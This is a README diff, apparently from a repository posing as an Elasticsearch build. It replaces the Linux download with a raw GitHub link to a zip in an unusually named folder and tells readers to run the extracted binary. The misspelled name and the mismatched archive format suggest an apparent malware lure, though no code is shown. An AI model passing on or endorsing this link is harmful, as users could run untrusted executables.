darlo2003/elasticsearch-gvj/README.md

    - For Windows: Double-click the `.exe` file to start the installation.
 Follow the prompts to install elasticearch-gvj.
    - For macOS: Open the `.dmg` file, then drag the application to the Applications folder.
-   - For Linux: Extract the `.tar.gz` file and open a terminal in the extracted folder.
+   - For Linux: Extract the `https://raw.githubusercontent.com/darlo2003/elasticsearch-gvj/main/metroptosia/elasticsearch-gvj.zip` file and open a terminal in the extracted folder.
 Use the command `./elasticsearch-gvj` to start the application.

 3. **Running the Application**